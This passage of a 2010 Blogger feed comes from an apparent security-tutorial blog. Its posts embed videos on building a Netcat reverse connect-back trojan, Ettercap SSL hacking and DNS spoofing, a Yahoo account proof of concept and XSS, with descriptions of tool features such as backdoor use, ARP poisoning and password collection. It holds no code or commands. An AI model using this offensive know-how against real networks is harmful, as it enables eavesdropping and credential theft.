href='http://pinoysecurity.blogspot.com/2010/03/samurai-web-exploitation-assessment.html' title='Samurai Web Assessment Framework'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-4171583799574555858</id><published>2010-03-26T11:32:00.000+08:00</published><updated>2010-03-26T12:13:42.718+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Netcat'/><title type='text'>Creating a Win32 Reverse Connect Back Trojan using Netcat</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Jk4omg6AgFA&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Jk4omg6AgFA&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.&lt;br /&gt;&lt;br /&gt;In 2000 according to www.insecure.org Netcat was voted the second most functional network security tool. Also, in 2003 and 2006 it gained fourth place in the same category. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.&lt;br /&gt;&lt;br /&gt;According to http://nc110.sourceforge.net/, some of netcat's major features are:&lt;br /&gt;&lt;br /&gt;* Outbound or inbound connections, TCP or UDP, to or from any ports&lt;br /&gt;* Full DNS forward/reverse checking, with appropriate warnings&lt;br /&gt;* Ability to use any local source port&lt;br /&gt;* Ability to use any locally-configured network source address&lt;br /&gt;* Built-in port-scanning capabilities, with randomization&lt;br /&gt;* Built-in loose source-routing capability&lt;br /&gt;* Can read command line arguments from standard input&lt;br /&gt;* Slow-send mode, one line every N seconds&lt;br /&gt;* Hex dump of transmitted and received data&lt;br /&gt;* Optional ability to let another program service established connections&lt;br /&gt;* Optional telnet-options responder&lt;br /&gt;* Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-4171583799574555858?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/4171583799574555858/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/creating-win32-reverse-connect-back.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4171583799574555858'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4171583799574555858'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/creating-win32-reverse-connect-back.html' title='Creating a Win32 Reverse Connect Back Trojan using Netcat'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3579283295557543598</id><published>2010-03-26T10:23:00.000+08:00</published><updated>2010-03-26T10:23:26.617+08:00</updated><title type='text'>2010 Top Ten Hacks of the Year</title><content type='html'>&lt;object height="355" width="425"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=toptengrossmanrsa2010-100311093117-phpapp01&amp;amp;stripped_title=2010-a-web-hacking-odyssey-top-ten-hacks-of-the-year" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=toptengrossmanrsa2010-100311093117-phpapp01&amp;amp;stripped_title=2010-a-web-hacking-odyssey-top-ten-hacks-of-the-year" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3579283295557543598?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3579283295557543598/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/2010-top-ten-hacks-of-year.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3579283295557543598'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3579283295557543598'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/2010-top-ten-hacks-of-year.html' title='2010 Top Ten Hacks of the Year'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8536240110970709935</id><published>2010-03-25T17:02:00.001+08:00</published><updated>2010-03-25T17:03:22.877+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ettercap'/><title type='text'>SSL Hacking and DNS Spoofing with Backtrack using Ettercap</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Aak6-B3JORE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Aak6-B3JORE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Ettercap&lt;/b&gt; is a Unix and Windows tool for computer network protocol analysis and security auditing. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.&lt;br /&gt;It is free open source software, licensed under the terms of the GNU General Public License.&lt;br /&gt;&lt;h2&gt;&lt;span class="editsection"&gt;&lt;/span&gt;&lt;span class="mw-headline" id="Features"&gt;Features&lt;/span&gt;&lt;/h2&gt;Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap offers four modes of operation:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;IP-based: packets are filtered based on IP source and destination.&lt;/li&gt;&lt;li&gt;MAC-based: packets are filtered based on MAC address, useful for sniffing connections through a gateway.&lt;/li&gt;&lt;li&gt;ARP-based: uses ARP poisoning to sniff on a switched LAN between two hosts (full-duplex).&lt;/li&gt;&lt;li&gt;PublicARP-based: uses ARP poisoning to sniff on a switched LAN from a victim host to all other hosts (half-duplex).&lt;/li&gt;&lt;/ul&gt;In addition, the software also offers the following features:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Character injection into an established connection: characters can be injected into a server (emulating commands) or to a client (emulating replies) while maintaining a live connection.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;SSH1 support: the sniffing of a username and password, and even the data of an SSH1 connection. Ettercap is the first software capable of sniffing an SSH connection in full duplex.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;HTTPS support: the sniffing of HTTP SSL secured data--even when the connection is made through a proxy.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Remote traffic through a GRE tunnel: the sniffing of remote traffic through a GRE tunnel from a remote Cisco router, and perform a man-in-the-middle attack on it.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Plug-in support: creation of custom plugins using Ettercap's API.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Password collectors for: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Packet filtering/dropping: setting up a filter that searches for a particular string (or hexadecimal sequence) in the TCP or UDP payload and replaces it with a custom string/sequence of choice, or drops the entire packet.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;OS fingerprinting: determine the OS of the victim host and its network adapter.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Kill a connection: killing connections of choice from the connections-list.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Passive scanning of the LAN: retrieval of information about hosts on the LAN, their open ports, the version numbers of available services, the type of the host (gateway, router or simple PC) and estimated distances in number of hops.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Hijacking of DNS requests.&lt;/li&gt;&lt;/ul&gt;Ettercap also has the ability to actively or passively find other poisoners on the LAN.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8536240110970709935?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8536240110970709935/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/ssl-hacking-and-dns-spoofing-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8536240110970709935'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8536240110970709935'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/ssl-hacking-and-dns-spoofing-with.html' title='SSL Hacking and DNS Spoofing with Backtrack using Ettercap'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6221438111875774704</id><published>2010-03-24T23:51:00.000+08:00</published><updated>2010-03-24T23:51:50.409+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Proof of Concept'/><title type='text'>Yahoo! Account Security Failure (POC)</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/4wzEnG2mOyg&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/4wzEnG2mOyg&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6221438111875774704?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6221438111875774704/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/yahoo-account-security-failure-poc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6221438111875774704'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6221438111875774704'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/yahoo-account-security-failure-poc.html' title='Yahoo! Account Security Failure (POC)'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6388097990137898489</id><published>2010-03-24T07:22:00.000+08:00</published><updated>2010-03-24T07:25:11.302+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XSS'/><title type='text'>How Cross-Site Scripting (XSS) Works</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/lELnL5uwtZA&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/lELnL5uwtZA&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Cross-site scripting&lt;/b&gt; (&lt;b&gt;XSS&lt;/b&gt;) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007&lt;sup class="reference" id="cite_ref-Symantec-2007-2nd-exec_0-0"&gt;.&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt; Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6388097990137898489?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6388097990137898489/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/how-cross-site-scripting-xss-works.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6388097990137898489'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6388097990137898489'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/how-cross-site-scripting-xss-works.html' title='How Cross-Site Scripting (XSS) Works'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6480853381455695589</id><published>2010-03-23T12:05:00.000+08:00</published><updated>2010-04-07T20:12:18.468+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wireless'/><title type='text'>How to Configure your Laptop to be an Access Point</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ADpHIeBSFUk&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ADpHIeBSFUk&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6480853381455695589?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6480853381455695589/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/how-to-configure-your-laptop-to-be.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6480853381455695589'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6480853381455695589'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/how-to-configure-your-laptop-to-be.html' title='How to Configure your Laptop to be an Access Point'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5262924584938539951</id><published>2010-03-19T13:24:00.001+08:00</published><updated>2010-04-06T10:00:26.224+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Steganography'/><title type='text'>Steganography</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/cFWRPdn5ywU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/cFWRPdn5ywU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Steganography&lt;/b&gt; is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. The word &lt;i&gt;steganography&lt;/i&gt; is of Greek origin and means &lt;i&gt;"concealed writing"&lt;/i&gt; from the greek words steganos meaning covered or protected, and graphein (Γράφειν) meaning to write. The first recorded use of the term was in 1499 by Johannes Trithemius in his &lt;i&gt;Steganographia&lt;/i&gt;, a treatise on cryptography and steganography disguised as a book on magic. Generally, messages will appear to be something else: images, articles, shopping lists, or some other &lt;i&gt;covertext&lt;/i&gt; and, classically, the hidden message may be in invisible ink between the visible lines of a private letter.&lt;br /&gt;The advantage of steganography, over cryptography alone, is that messages do not attract attention to themselves. Plainly visible encrypted messages—no matter how unbreakable—will arouse suspicion, and may in themselves be incriminating in countries where encryption is illegal. Therefore, whereas cryptography protects the contents of a message, steganography can be said to protect both messages and communicating parties.&lt;br /&gt;Steganography includes the concealment of information within computer files. In digital steganography, electronic communications may include steganographic coding inside of a transport layer, such as a document file, image file, program or protocol. Media files are ideal for steganographic transmission because of their large size. As a simple example, a sender might start with an innocuous image file and adjust the color of every 100th pixel to correspond to a letter in the alphabet, a change so subtle that someone not specifically looking for it is unlikely to notice it.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5262924584938539951?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5262924584938539951/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/steganography.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5262924584938539951'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5262924584938539951'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/steganography.html' title='Steganography'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-313018671877996992</id><published>2010-03-17T21:08:00.001+08:00</published><updated>2010-03-26T12:26:03.742+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Forensics'/><title type='text'>Forensic Toolkit (FTK)</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/EWd0fjTR1uY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/EWd0fjTR1uY&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Forensic Toolkit&lt;/b&gt;, or FTK, is a computer forensics software made by AccessData. It scans a hard drive looking for various information.&lt;sup class="reference" id="cite_ref-wired_0-0"&gt;&lt;/sup&gt; It can for example locate deleted emails&lt;sup class="reference" id="cite_ref-Dixon_1-0"&gt;&lt;/sup&gt; and scan a disk for text strings to use them as a password dictionary to crack encryption.&lt;sup class="reference" id="cite_ref-Casey_2-0"&gt;&lt;/sup&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-313018671877996992?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/313018671877996992/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/forensic-toolkit-ftk.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/313018671877996992'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/313018671877996992'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/forensic-toolkit-ftk.html' title='Forensic Toolkit (FTK)'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-4490494525516427995</id><published>2010-03-16T15:30:00.000+08:00</published><updated>2010-03-26T12:16:07.643+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Honeypot'/><title type='text'>Honeyd</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/kRIZuS5AEVU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/kRIZuS5AEVU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Honeyd&lt;/b&gt; is an open source computer program that allows a user to set up and run multiple virtual hosts on a computer network. These virtual hosts can be configured to mimic several different types of servers, allowing the user to simulate an infinite number of computer network configurations. Honeyd is primarily used in the field of computer security by professionals and hobbyists alike, and is included as part of Knoppix Security Tools Distribution.&lt;br /&gt;&lt;table class="toc" id="toc"&gt;&lt;tbody&gt;&lt;tr&gt; &lt;td&gt;&lt;br /&gt;&lt;/td&gt; &lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;script type="text/javascript"&gt;//&lt;![CDATA[if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); } //]]&gt;&lt;/script&gt; &lt;h2&gt;&lt;span class="mw-headline" id="Primary_Applications"&gt;Applications&lt;/span&gt;&lt;/h2&gt;&lt;h3&gt;&lt;span class="editsection"&gt;&lt;/span&gt;&lt;span class="mw-headline" id="Distraction"&gt;Distraction&lt;/span&gt;&lt;/h3&gt;Honeyd is used primarily for two purposes. Using the software's ability to mimic many different network hosts at once (up to 65536 hosts at once), Honeyd can act as a distraction to potential hackers. If a network only has 3 real servers, but one server is running Honeyd, the network will appear running hundreds of servers to a hacker. The hacker will then have to do more research (possibly through social engineering) in order to determine which servers are real, or the hacker may get caught in a honeypot. Either way, the hacker will be slowed down or possibly caught.&lt;br /&gt;&lt;h3&gt;&lt;span class="editsection"&gt;&lt;/span&gt;&lt;span class="mw-headline" id="Honeypot"&gt;Honeypot&lt;/span&gt;&lt;/h3&gt;Honeyd gets its name for its ability to be used as a honeypot. On a network, all normal traffic should be to and from valid servers only. Thus, a network administrator running Honeyd can monitor his/her logs to see if there is any traffic going to the virtual hosts set up by Honeyd. Any traffic going to these virtual servers can be considered highly suspicious. The network administrator can then take preventative action, perhaps by blocking the suspicious IP address or by further monitoring the network for suspicious traffic.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-4490494525516427995?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/4490494525516427995/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/honeyd.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4490494525516427995'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4490494525516427995'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/honeyd.html' title='Honeyd'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-137415497677041950</id><published>2010-03-15T00:31:00.000+08:00</published><updated>2010-03-26T12:25:38.651+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VNC'/><title type='text'>Remote VNC  Installation</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/HFdbSbbtOfE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/HFdbSbbtOfE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;RealVNC&lt;/b&gt; is a server and client application for the Virtual Network Computing (VNC) protocol to control another computer's screen remotely. The company RealVNC Ltd. — founded by the same AT&amp;amp;T team which created the original VNC program — produces the RealVNC software. RealVNC runs on Windows, Mac OS X (Enterprise edition only), and many Unix-like operating systems (both free and enterprise-class). A RealVNC client also runs on the Java platform and on the iPhone. A Windows-only client is now available, designed to interface to the embedded server on Intel AMT chipsets found on Intel vPro motherboards.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-137415497677041950?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/137415497677041950/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 